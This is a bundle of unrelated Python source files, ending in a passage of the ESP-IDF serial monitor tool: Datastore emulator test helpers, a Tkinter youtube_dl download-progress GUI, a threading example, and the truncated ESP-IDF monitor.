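    # served from the happyeyeballs.happylist cache instead of re-probing.
    start_demo = time.monotonic()
    print(happyeyeballs('www.google.com'))
    print('cached lookup took %.1f ms' % (1000 * (time.monotonic() - start_demo)))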
|
test_utils.py
|
# Copyright 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
################################################################################
"""Utility functions for testing cloud functions."""
import datetime
import os
import subprocess
import threading
import requests
DATASTORE_READY_INDICATOR = b'is now running'
DATASTORE_EMULATOR_PORT = 8432
EMULATOR_TIMEOUT = 20
TEST_PROJECT_ID = 'test-project'
# pylint: disable=arguments-differ
class SpoofedDatetime(datetime.datetime):
"""Mocking Datetime class for now() function."""
@classmethod
def now(cls):
return datetime.datetime(2020, 1, 1, 0, 0, 0)
def start_datastore_emulator():
"""Start Datastore emulator."""
return subprocess.Popen([
'gcloud',
'beta',
'emulators',
'datastore',
'start',
'--consistency=1.0',
'--host-port=localhost:' + str(DATASTORE_EMULATOR_PORT),
'--project=' + TEST_PROJECT_ID,
'--no-store-on-disk',
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
def wait_for_emulator_ready(proc,
emulator,
indicator,
timeout=EMULATOR_TIMEOUT):
"""Wait for emulator to be ready."""
def _read_thread(proc, ready_event):
"""Thread to continuously read from the process stdout."""
ready = False
while True:
line = proc.stdout.readline()
if not line:
break
if not ready and indicator in line:
ready = True
ready_event.set()
# Wait for process to become ready.
ready_event = threading.Event()
thread = threading.Thread(target=_read_thread, args=(proc, ready_event))
thread.daemon = True
thread.start()
if not ready_event.wait(timeout):
raise RuntimeError(
'{} emulator did not get ready in time.'.format(emulator))
return thread
def reset_ds_emulator():
"""Reset ds emulator/clean all entities."""
req = requests.post(
'http://localhost:{}/reset'.format(DATASTORE_EMULATOR_PORT))
req.raise_for_status()
def cleanup_emulator(ds_emulator):
"""Cleanup the system processes made by ds emulator."""
    del ds_emulator  # TODO: find a better way to clean up the emulator
os.system('pkill -f datastore')
def set_gcp_environment():
"""Set environment variables for simulating in google cloud platform."""
os.environ['DATASTORE_EMULATOR_HOST'] = 'localhost:' + str(
DATASTORE_EMULATOR_PORT)
os.environ['GOOGLE_CLOUD_PROJECT'] = TEST_PROJECT_ID
os.environ['DATASTORE_DATASET'] = TEST_PROJECT_ID
os.environ['GCP_PROJECT'] = TEST_PROJECT_ID
os.environ['FUNCTION_REGION'] = 'us-central1'
def get_test_data_file_path(filename):
"""Returns the path to a test data file with name |filename|."""
return os.path.join(os.path.dirname(__file__), 'test_data', filename)
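
# --- Usage sketch (editorial addition) ---
# Typical flow for a test module built on these helpers; assumes the gcloud
# SDK with the Datastore emulator component is installed locally.
if __name__ == '__main__':
    proc = start_datastore_emulator()
    wait_for_emulator_ready(proc, 'datastore', DATASTORE_READY_INDICATOR)
    set_gcp_environment()
    try:
        reset_ds_emulator()  # start from a clean datastore before each test
    finally:
        cleanup_emulator(proc)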
|
update_preview.py
|
from tkinter import *
from tkinter import ttk
import threading
import os
from PIL import Image, ImageTk
import youtube_dl as yt
def my_hook(d):
global status, merged
if kill_event.is_set():
print("\nTerminated")
delthread = threading.Timer(3.0, lambda: os.remove(d['tmpfilename']))
delthread.start()
raise ConnectionAbortedError
if pause_event.is_set():
print("\nPaused")
raise ConnectionAbortedError
if d['status'] == 'finished':
if merged:
status = 'Finished'
update_dict()
else:
status = 'Post Processing'
merged = True
update_dict()
treeview.item(row, text=meta['title'])
treeview.set(row, 'ext', f'.{meta["ext"].lower()}')
treeview.set(row, 'size', d['_total_bytes_str'])
treeview.set(row, 'percent', '100.0%')
treeview.set(row, 'eta', '0:00')
treeview.set(row, 'speed', 'N/A')
treeview.set(row, 'status', status)
        # A fresh Event is never set, so this wait() is simply a 1.5 s sleep.
        thread_event = threading.Event()
        thread_event.wait(1.50)
if d['status'] == 'downloading':
if status != 'Downloading':
status = 'Downloading'
update_dict()
treeview.item(row, text=meta['title'])
treeview.set(row, 'ext', f'.{meta["ext"].lower()}')
treeview.set(row, 'size', d['_total_bytes_str'])
treeview.set(row, 'percent', d['_percent_str'])
treeview.set(row, 'eta', d['_eta_str'])
treeview.set(row, 'speed', d['_speed_str'])
treeview.set(row, 'status', status)
if d['status'] == 'error':
if status != 'Error':
status = 'Error'
update_dict()
treeview.item(row, text=meta['title'])
treeview.set(row, 'ext', f'.{meta["ext"].lower()}')
treeview.set(row, 'size', '-')
treeview.set(row, 'percent', '-')
treeview.set(row, 'eta', '-')
treeview.set(row, 'speed', '-')
treeview.set(row, 'status', status)
class MyLogger:
@staticmethod
def debug(msg):
thread_event = threading.Event()
thread_event.wait(0.25)
@staticmethod
def warning(msg):
if msg == "ERROR: unable to download video data: ":
pass
else:
global status
if status != 'Error':
status = 'Error'
update_dict()
treeview.item(row, text=meta['title'])
treeview.set(row, 'ext', f'.{meta["ext"].lower()}')
treeview.set(row, 'size', '-')
treeview.set(row, 'percent', '-')
treeview.set(row, 'eta', '-')
treeview.set(row, 'speed', '-')
treeview.set(row, 'status', status)
print(msg)
@staticmethod
def error(msg):
if msg == "ERROR: unable to download video data: ":
pass
else:
global status
if status != 'Error':
status = 'Error'
update_dict()
treeview.item(row, text=meta['title'])
treeview.set(row, 'ext', f'.{meta["ext"].lower()}')
treeview.set(row, 'size', '-')
treeview.set(row, 'percent', '-')
treeview.set(row, 'eta', '-')
treeview.set(row, 'speed', '-')
treeview.set(row, 'status', status)
print(msg)
root = Tk()
root.title("Learning Tkinter - TreeView")
root.configure(bg='#ededed', bd=5)
root.geometry("1000x280")
root.minsize(1000, 280) # can set the minimum size
root.maxsize(1000, 560) # can set the maximum size
def resize(event):
try:
height = root.winfo_height()
terminate_btn.place(x=920, y=height-50)
pause_btn.place(x=500, y=height-50)
except:
pass
root.bind("<Configure>", resize)
treeview = ttk.Treeview(root)
treeview.grid(padx=29)
treeview.config(height=10)
treeview.config(columns=('ext', 'size', 'percent', 'eta', 'speed', 'status'))
treeview.column('#0', width=280, anchor=W)
treeview.column('ext', width=100, anchor=W)
treeview.column('size', width=100, anchor=W)
treeview.column('percent', width=100, anchor=W)
treeview.column('eta', width=100, anchor=W)
treeview.column('speed', width=100, anchor=W)
treeview.column('status', width=150, anchor=W)
treeview.heading('#0', text="Title", anchor=W)
treeview.heading('ext', text="Extension", anchor=W)
treeview.heading('size', text="Size", anchor=W)
treeview.heading('percent', text="Percent", anchor=W)
treeview.heading('eta', text="ETA", anchor=W)
treeview.heading('speed', text="Speed", anchor=W)
treeview.heading('status', text="Status", anchor=W)
status = 'Queued'
row = 'URL1'
merged = False
rows = ['URL1']
row_dict = {
"URL1": status
}
treeview.insert("", '0', row, text="-")
treeview.set(row, 'ext', '-')
treeview.set(row, 'size', '-')
treeview.set(row, 'percent', '0.0%')
treeview.set(row, 'eta', '-')
treeview.set(row, 'speed', '-')
treeview.set(row, 'status', status)
count = 1
def callback(event):
global count
def remove(i):
treeview.selection_remove(i)
def assign():
global count
count = 1
if count == 1:
count = 2
for i in row_dict:
if row_dict.get(i) == 'Terminated':
remove(i)
if row_dict.get(i) == 'Queued':
remove(i)
thread = threading.Timer(0.2, assign) # using threading to stop this function from looping
thread.start()
def update_dict():
row_dict.update(URL1=status)
print(row_dict)
def pause_thread():
def pause():
if treeview.selection() == ():
pass
else:
global resume_btn, resume_img, status
status = 'Paused'
update_dict()
treeview.set(row, 'status', status)
pause_btn.destroy()
resume_img = ImageTk.PhotoImage(Image.open('images/#resume_32px.png'))
resume_btn = ttk.Button(root, image=resume_img, command=resume_thread)
resume_btn.place(x=500, y=root.winfo_height()-50)
pause_event.set()
pause_thread = threading.Thread(target=pause)
pause_thread.start()
def resume_thread():
def resume():
if treeview.selection() == ():
pass
else:
global pause_btn, pause_img, status
status = 'Resuming'
update_dict()
treeview.set(row, 'status', status)
resume_btn.destroy()
pause_img = ImageTk.PhotoImage(Image.open('images/#pause_32px.png'))
pause_btn = ttk.Button(root, image=pause_img, command=pause_thread)
pause_btn.place(x=500, y=root.winfo_height()-50)
resume_event.set()
if resume_event.is_set():
pause_event.clear()
resume_event.clear()
download_ytdl()
resume_thread = threading.Thread(target=resume)
resume_thread.start()
def terminate_thread():
def terminate():
if treeview.selection() == ():
pass
else:
global status
status = 'Terminated'
treeview.item(row, text='TERMINATED')
            treeview.set(row, 'ext', 'N/A')  # plain string; no f-string placeholders needed
treeview.set(row, 'size', 'N/A')
treeview.set(row, 'percent', '0.0%')
treeview.set(row, 'eta', '0:00')
treeview.set(row, 'speed', 'N/A')
treeview.set(row, 'status', status)
update_dict()
treeview.selection_remove(row)
kill_event.set()
terminate_thread = threading.Thread(target=terminate)
terminate_thread.start()
treeview.bind("<<TreeviewSelect>>", callback)
treeview.config(selectmode='browse') # allow 1 at a time to be selected
terminate_img = ImageTk.PhotoImage(Image.open('images/#stop_32px.png'))
terminate_btn = ttk.Button(root, image=terminate_img, command=terminate_thread)
terminate_btn.place(x=920, y=230)
pause_img = ImageTk.PhotoImage(Image.open('images/#pause_32px.png'))
pause_btn = ttk.Button(root, image=pause_img, command=pause_thread)
pause_btn.place(x=500, y=230)
pause_event = threading.Event()
resume_event = threading.Event()
kill_event = threading.Event()
video_ops = {
'outtmpl': 'R:/Downloaded Videos/%(title)s.%(ext)s',
'format': 'bestvideo[height<=360,width<=640]+bestaudio/best[abr<=1441]',
'ext': 'mkv',
'merge_output_format': 'mkv',
'quiet': True,
'progress_hooks': [my_hook],
'logger': MyLogger()
}
link = 'https://www.youtube.com/watch?v=QglaLzo_aPk'
def download_ytdl():
with yt.YoutubeDL(video_ops) as ydl:
global meta, status
if status == 'Queued':
meta = ydl.extract_info(link, download=False)
status = 'Pre Processing'
update_dict()
treeview.item(row, text=link)
treeview.set(row, 'status', status)
thread_event = threading.Event()
thread_event.wait(1.00)
try:
ydl.download([link])
except yt.utils.DownloadError as exc:
if status == 'Terminated':
kill_event.clear()
yt_thread = threading.Timer(5.0, download_ytdl)
yt_thread.start()
mainloop()
|
printer.py
|
from threading import Thread
from time import sleep
def printer():
for i in range(3):
print(i, end=" ")
sleep(0.1)
thr = Thread(target=printer, daemon=True)
thr.start()
# A daemon thread is killed as soon as the main thread exits, so join() is
# needed here to let all three numbers print before the final newline.
thr.join()
print()  # Add newline
|
idf_monitor.py
|
#!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run flash build target to rebuild and flash entire project (Ctrl-T Ctrl-F)
# - Run app-flash build target to rebuild and flash app only (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import print_function, division
from __future__ import unicode_literals
from builtins import chr
from builtins import object
from builtins import bytes
import subprocess
import argparse
import codecs
import datetime
import re
import os
try:
import queue
except ImportError:
import Queue as queue
import shlex
import time
import sys
import serial
import serial.tools.list_ports
import serial.tools.miniterm as miniterm
import threading
import ctypes
import types
from distutils.version import StrictVersion
from io import open
import textwrap
key_description = miniterm.key_description
# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_Y = '\x19'
CTRL_P = '\x10'
CTRL_X = '\x18'
CTRL_L = '\x0c'
CTRL_RBRACKET = '\x1d' # Ctrl+]
# Command parsed from console inputs
CMD_STOP = 1
CMD_RESET = 2
CMD_MAKE = 3
CMD_APP_FLASH = 4
CMD_OUTPUT_TOGGLE = 5
CMD_TOGGLE_LOGGING = 6
CMD_ENTER_BOOT = 7
# ANSI terminal codes (if changed, regular expressions in LineMatcher need to be updated)
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color):
""" Print a message to stderr with colored highlighting """
sys.stderr.write("%s%s%s\n" % (color, message, ANSI_NORMAL))
def yellow_print(message):
color_print(message, ANSI_YELLOW)
def red_print(message):
color_print(message, ANSI_RED)
__version__ = "1.1"
# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
TAG_SERIAL_FLUSH = 2
TAG_CMD = 3
# regex matches a potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)
DEFAULT_TOOLCHAIN_PREFIX = "xtensa-esp32-elf-"
DEFAULT_PRINT_FILTER = ""
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
self._thread = None
@property
def alive(self):
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
pass # override to provide cancellation functionality
def run(self):
pass # override for the main thread behaviour
def _run_outer(self):
try:
self.run()
finally:
self._thread = None
def stop(self):
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
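# Editorial note: subclasses override run() with a loop that polls self.alive
# and _cancel() to unblock any blocking call, so stop() can join the thread;
# see ConsoleReader and SerialReader below. Because _run_outer() clears
# self._thread on exit, the same object can be start()ed again later.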
class ConsoleReader(StoppableThread):
""" Read input keys from the console and push them to the queue,
until stopped.
"""
def __init__(self, console, event_queue, cmd_queue, parser, test_mode):
super(ConsoleReader, self).__init__()
self.console = console
self.event_queue = event_queue
self.cmd_queue = cmd_queue
self.parser = parser
self.test_mode = test_mode
def run(self):
self.console.setup()
try:
while self.alive:
try:
if os.name == 'nt':
# Windows kludge: because the console.cancel() method doesn't
# seem to work to unblock getkey() on the Windows implementation.
#
# So we only call getkey() if we know there's a key waiting for us.
import msvcrt
while not msvcrt.kbhit() and self.alive:
time.sleep(0.1)
if not self.alive:
break
elif self.test_mode:
                        # In testing mode, stdin is connected to a PTY but is not used for any input. For a PTY,
                        # cancellation via fcntl.ioctl does not work and we would hang in self.console.getkey().
# Therefore, we avoid calling it.
while self.alive:
time.sleep(0.1)
break
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if c is not None:
ret = self.parser.parse(c)
if ret is not None:
(tag, cmd) = ret
# stop command should be executed last
if tag == TAG_CMD and cmd != CMD_STOP:
self.cmd_queue.put(ret)
else:
self.event_queue.put(ret)
finally:
self.console.cleanup()
def _cancel(self):
if os.name == 'posix' and not self.test_mode:
# this is the way cancel() is implemented in pyserial 3.3 or newer,
# older pyserial (3.1+) has cancellation implemented via 'select',
# which does not work when console sends an escape sequence response
#
# even older pyserial (<3.1) does not have this method
#
# on Windows there is a different (also hacky) fix, applied above.
#
# note that TIOCSTI is not implemented in WSL / bash-on-Windows.
# TODO: introduce some workaround to make it work there.
#
# Note: This would throw exception in testing mode when the stdin is connected to PTY.
import fcntl
import termios
fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class ConsoleParser(object):
def __init__(self, eol="CRLF"):
self.translate_eol = {
"CRLF": lambda c: c.replace("\n", "\r\n"),
"CR": lambda c: c.replace("\n", "\r"),
"LF": lambda c: c.replace("\r", "\n"),
}[eol]
self.menu_key = CTRL_T
self.exit_key = CTRL_RBRACKET
self._pressed_menu_key = False
def parse(self, key):
ret = None
if self._pressed_menu_key:
ret = self._handle_menu_key(key)
elif key == self.menu_key:
self._pressed_menu_key = True
elif key == self.exit_key:
ret = (TAG_CMD, CMD_STOP)
else:
key = self.translate_eol(key)
ret = (TAG_KEY, key)
return ret
def _handle_menu_key(self, c):
ret = None
if c == self.exit_key or c == self.menu_key: # send verbatim
ret = (TAG_KEY, c)
elif c in [CTRL_H, 'h', 'H', '?']:
red_print(self.get_help_text())
elif c == CTRL_R: # Reset device via RTS
ret = (TAG_CMD, CMD_RESET)
elif c == CTRL_F: # Recompile & upload
ret = (TAG_CMD, CMD_MAKE)
elif c in [CTRL_A, 'a', 'A']: # Recompile & upload app only
# "CTRL-A" cannot be captured with the default settings of the Windows command line, therefore, "A" can be used
# instead
ret = (TAG_CMD, CMD_APP_FLASH)
elif c == CTRL_Y: # Toggle output display
ret = (TAG_CMD, CMD_OUTPUT_TOGGLE)
elif c == CTRL_L: # Toggle saving output into file
ret = (TAG_CMD, CMD_TOGGLE_LOGGING)
elif c == CTRL_P:
yellow_print("Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart")
            # quickly trigger the pause without pressing the menu key again
ret = (TAG_CMD, CMD_ENTER_BOOT)
elif c in [CTRL_X, 'x', 'X']: # Exiting from within the menu
ret = (TAG_CMD, CMD_STOP)
else:
red_print('--- unknown menu character {} --'.format(key_description(c)))
self._pressed_menu_key = False
return ret
def get_help_text(self):
text = """\
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:14} Send the menu character itself to remote
--- {exit:14} Send the exit character itself to remote
--- {reset:14} Reset target board via RTS line
--- {makecmd:14} Build & flash project
--- {appmake:14} Build & flash app only
--- {output:14} Toggle output display
--- {log:14} Toggle saving output into file
--- {pause:14} Reset target into bootloader to pause app via RTS line
--- {menuexit:14} Exit program
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
makecmd=key_description(CTRL_F),
appmake=key_description(CTRL_A) + ' (or A)',
output=key_description(CTRL_Y),
log=key_description(CTRL_L),
pause=key_description(CTRL_P),
menuexit=key_description(CTRL_X) + ' (or X)')
return textwrap.dedent(text)
def get_next_action_text(self):
text = """\
--- Press {} to exit monitor.
--- Press {} to build & flash project.
--- Press {} to build & flash app.
--- Press any other key to resume monitor (resets target).
""".format(key_description(self.exit_key),
key_description(CTRL_F),
key_description(CTRL_A))
return textwrap.dedent(text)
def parse_next_action_key(self, c):
ret = None
if c == self.exit_key:
ret = (TAG_CMD, CMD_STOP)
elif c == CTRL_F: # Recompile & upload
ret = (TAG_CMD, CMD_MAKE)
elif c in [CTRL_A, 'a', 'A']: # Recompile & upload app only
# "CTRL-A" cannot be captured with the default settings of the Windows command line, therefore, "A" can be used
# instead
ret = (TAG_CMD, CMD_APP_FLASH)
return ret
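# Editorial note: ConsoleParser is stateful. Pressing the menu key (Ctrl-T)
# arms it and parse() returns None; the next key then selects the action,
# e.g. parse(CTRL_T) -> None followed by parse(CTRL_R) -> (TAG_CMD, CMD_RESET),
# while ordinary keys come back as (TAG_KEY, key) with EOL translation applied.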
class SerialReader(StoppableThread):
""" Read serial data from the serial port and push to the
event queue, until stopped.
"""
def __init__(self, serial, event_queue):
super(SerialReader, self).__init__()
self.baud = serial.baudrate
self.serial = serial
self.event_queue = event_queue
if not hasattr(self.serial, 'cancel_read'):
# enable timeout for checking alive flag,
# if cancel_read not available
self.serial.timeout = 0.25
def run(self):
if not self.serial.is_open:
self.serial.baudrate = self.baud
self.serial.rts = True # Force an RTS reset on open
self.serial.open()
self.serial.rts = False
try:
while self.alive:
data = self.serial.read(self.serial.in_waiting or 1)
if len(data):
self.event_queue.put((TAG_SERIAL, data), False)
finally:
self.serial.close()
def _cancel(self):
if hasattr(self.serial, 'cancel_read'):
try:
self.serial.cancel_read()
except Exception:
pass
class LineMatcher(object):
"""
Assembles a dictionary of filtering rules based on the --print_filter
argument of idf_monitor. Then later it is used to match lines and
determine whether they should be shown on screen or not.
"""
LEVEL_N = 0
LEVEL_E = 1
LEVEL_W = 2
LEVEL_I = 3
LEVEL_D = 4
LEVEL_V = 5
level = {'N': LEVEL_N, 'E': LEVEL_E, 'W': LEVEL_W, 'I': LEVEL_I, 'D': LEVEL_D,
'V': LEVEL_V, '*': LEVEL_V, '': LEVEL_V}
def __init__(self, print_filter):
self._dict = dict()
self._re = re.compile(r'^(?:\033\[[01];?[0-9]+m?)?([EWIDV]) \([0-9]+\) ([^:]+): ')
items = print_filter.split()
if len(items) == 0:
self._dict["*"] = self.LEVEL_V # default is to print everything
for f in items:
s = f.split(r':')
if len(s) == 1:
# specifying no warning level defaults to verbose level
lev = self.LEVEL_V
elif len(s) == 2:
if len(s[0]) == 0:
raise ValueError('No tag specified in filter ' + f)
try:
lev = self.level[s[1].upper()]
except KeyError:
raise ValueError('Unknown warning level in filter ' + f)
else:
raise ValueError('Missing ":" in filter ' + f)
self._dict[s[0]] = lev
def match(self, line):
try:
m = self._re.search(line)
if m:
lev = self.level[m.group(1)]
if m.group(2) in self._dict:
return self._dict[m.group(2)] >= lev
return self._dict.get("*", self.LEVEL_N) >= lev
except (KeyError, IndexError):
# Regular line written with something else than ESP_LOG*
# or an empty line.
pass
# We need something more than "*.N" for printing.
return self._dict.get("*", self.LEVEL_N) > self.LEVEL_N
class SerialStopException(Exception):
"""
This exception is used for stopping the IDF monitor in testing mode.
"""
pass
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
def __init__(self, serial_instance, elf_file, print_filter, make="make", toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"):
super(Monitor, self).__init__()
self.event_queue = queue.Queue()
self.cmd_queue = queue.Queue()
self.console = miniterm.Console()
if os.name == 'nt':
sys.stderr = ANSIColorConverter(sys.stderr, decode_output=True)
self.console.output = ANSIColorConverter(self.console.output)
self.console.byte_output = ANSIColorConverter(self.console.byte_output)
if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):
# Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)
def getkey_patched(self):
c = self.enc_stdin.read(1)
if c == chr(0x7f):
c = chr(8) # map the BS key (which yields DEL) to backspace
return c
self.console.getkey = types.MethodType(getkey_patched, self.console)
        socket_mode = serial_instance.port.startswith("socket://")  # testing hook - data from the serial port can make the monitor exit
self.serial = serial_instance
self.console_parser = ConsoleParser(eol)
self.console_reader = ConsoleReader(self.console, self.event_queue, self.cmd_queue, self.console_parser, socket_mode)
self.serial_reader = SerialReader(self.serial, self.event_queue)
self.elf_file = elf_file
if not os.path.exists(make):
self.make = shlex.split(make) # allow for possibility the "make" arg is a list of arguments (for idf.py)
else:
self.make = make
self.toolchain_prefix = toolchain_prefix
# internal state
self._last_line_part = b""
self._gdb_buffer = b""
self._pc_address_buffer = b""
self._line_matcher = LineMatcher(print_filter)
self._invoke_processing_last_line_timer = None
self._force_line_print = False
self._output_enabled = True
self._serial_check_exit = socket_mode
self._log_file = None
def invoke_processing_last_line(self):
self.event_queue.put((TAG_SERIAL_FLUSH, b''), False)
def main_loop(self):
self.console_reader.start()
self.serial_reader.start()
try:
while self.console_reader.alive and self.serial_reader.alive:
try:
item = self.cmd_queue.get_nowait()
except queue.Empty:
try:
item = self.event_queue.get(True, 0.03)
except queue.Empty:
continue
(event_tag, data) = item
if event_tag == TAG_CMD:
self.handle_commands(data)
elif event_tag == TAG_KEY:
try:
self.serial.write(codecs.encode(data))
except serial.SerialException:
pass # this shouldn't happen, but sometimes port has closed in serial thread
except UnicodeEncodeError:
pass # this can happen if a non-ascii character was passed, ignoring
elif event_tag == TAG_SERIAL:
self.handle_serial_input(data)
if self._invoke_processing_last_line_timer is not None:
self._invoke_processing_last_line_timer.cancel()
self._invoke_processing_last_line_timer = threading.Timer(0.1, self.invoke_processing_last_line)
self._invoke_processing_last_line_timer.start()
                    # If no further data is received within the next short
                    # period of time, the _invoke_processing_last_line_timer
                    # generates an event which results in finishing the last
                    # line. This is a fix for handling lines sent without EOL.
elif event_tag == TAG_SERIAL_FLUSH:
self.handle_serial_input(data, finalize_line=True)
else:
raise RuntimeError("Bad event data %r" % ((event_tag,data),))
except SerialStopException:
sys.stderr.write(ANSI_NORMAL + "Stopping condition has been received\n")
finally:
try:
self.console_reader.stop()
self.serial_reader.stop()
self.stop_logging()
# Cancelling _invoke_processing_last_line_timer is not
# important here because receiving empty data doesn't matter.
self._invoke_processing_last_line_timer = None
except Exception:
pass
sys.stderr.write(ANSI_NORMAL + "\n")
def handle_serial_input(self, data, finalize_line=False):
sp = data.split(b'\n')
if self._last_line_part != b"":
# add unprocessed part from previous "data" to the first line
sp[0] = self._last_line_part + sp[0]
self._last_line_part = b""
if sp[-1] != b"":
# last part is not a full line
self._last_line_part = sp.pop()
for line in sp:
if line != b"":
if self._serial_check_exit and line == self.console_parser.exit_key.encode('latin-1'):
raise SerialStopException()
if self._force_line_print or self._line_matcher.match(line.decode(errors="ignore")):
self._print(line + b'\n')
self.handle_possible_pc_address_in_line(line)
self.check_gdbstub_trigger(line)
self._force_line_print = False
        # Now we have the last part (incomplete line) in _last_line_part. By
        # default we don't touch it and just wait for the arrival of the rest
        # of the line. But if we haven't received it after some time, we need
        # to make a decision.
if self._last_line_part != b"":
if self._force_line_print or (finalize_line and self._line_matcher.match(self._last_line_part.decode(errors="ignore"))):
self._force_line_print = True
self._print(self._last_line_part)
self.handle_possible_pc_address_in_line(self._last_line_part)
self.check_gdbstub_trigger(self._last_line_part)
# It is possible that the incomplete line cuts in half the PC
# address. A small buffer is kept and will be used the next time
# handle_possible_pc_address_in_line is invoked to avoid this problem.
# MATCH_PCADDR matches 10 character long addresses. Therefore, we
# keep the last 9 characters.
self._pc_address_buffer = self._last_line_part[-9:]
# GDB sequence can be cut in half also. GDB sequence is 7
# characters long, therefore, we save the last 6 characters.
self._gdb_buffer = self._last_line_part[-6:]
self._last_line_part = b""
# else: keeping _last_line_part and it will be processed the next time
# handle_serial_input is invoked
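        # Editorial example of the buffering above: if b"foo\nba" arrives,
        # b"foo" is printed as a complete line and b"ba" is kept in
        # _last_line_part; when b"r\n" arrives next they are joined and
        # b"bar" is printed. A TAG_SERIAL_FLUSH event forces the remainder out.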
def handle_possible_pc_address_in_line(self, line):
line = self._pc_address_buffer + line
self._pc_address_buffer = b""
for m in re.finditer(MATCH_PCADDR, line.decode(errors="ignore")):
self.lookup_pc_address(m.group())
def __enter__(self):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
def __exit__(self, *args, **kwargs):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.console_reader.start()
self.serial_reader.start()
def prompt_next_action(self, reason):
self.console.setup() # set up console to trap input characters
try:
red_print("--- {}".format(reason))
red_print(self.console_parser.get_next_action_text())
k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
while k == CTRL_T:
k = self.console.getkey()
finally:
self.console.cleanup()
ret = self.console_parser.parse_next_action_key(k)
if ret is not None:
cmd = ret[1]
if cmd == CMD_STOP:
# the stop command should be handled last
self.event_queue.put(ret)
else:
self.cmd_queue.put(ret)
def run_make(self, target):
with self:
if isinstance(self.make, list):
popen_args = self.make + [target]
else:
popen_args = [self.make, target]
yellow_print("Running %s..." % " ".join(popen_args))
p = subprocess.Popen(popen_args)
try:
p.wait()
except KeyboardInterrupt:
p.wait()
if p.returncode != 0:
self.prompt_next_action("Build failed")
else:
self.output_enable(True)
def lookup_pc_address(self, pc_addr):
cmd = ["%saddr2line" % self.toolchain_prefix,
"-pfiaC", "-e", self.elf_file, pc_addr]
try:
translation = subprocess.check_output(cmd, cwd=".")
if b"?? ??:0" not in translation:
self._print(translation.decode(), console_printer=yellow_print)
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
def check_gdbstub_trigger(self, line):
line = self._gdb_buffer + line
self._gdb_buffer = b""
m = re.search(b"\\$(T..)#(..)", line) # look for a gdb "reason" for a break
if m is not None:
try:
chsum = sum(ord(bytes([p])) for p in m.group(1)) & 0xFF
calc_chsum = int(m.group(2), 16)
except ValueError:
return # payload wasn't valid hex digits
if chsum == calc_chsum:
self.run_gdb()
else:
red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum))
def run_gdb(self):
with self: # disable console control
sys.stderr.write(ANSI_NORMAL)
try:
cmd = ["%sgdb" % self.toolchain_prefix,
"-ex", "set serial baud %d" % self.serial.baudrate,
"-ex", "target remote %s" % self.serial.port,
"-ex", "interrupt", # monitor has already parsed the first 'reason' command, need a second
self.elf_file]
process = subprocess.Popen(cmd, cwd=".")
process.wait()
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
except KeyboardInterrupt:
pass # happens on Windows, maybe other OSes
finally:
try:
# on Linux, maybe other OSes, gdb sometimes seems to be alive even after wait() returns...
process.terminate()
except Exception:
pass
try:
# also on Linux, maybe other OSes, gdb sometimes exits uncleanly and breaks the tty mode
subprocess.call(["stty", "sane"])
except Exception:
pass # don't care if there's no stty, we tried...
self.prompt_next_action("gdb exited")
def output_enable(self, enable):
self._output_enabled = enable
def output_toggle(self):
self._output_enabled = not self._output_enabled
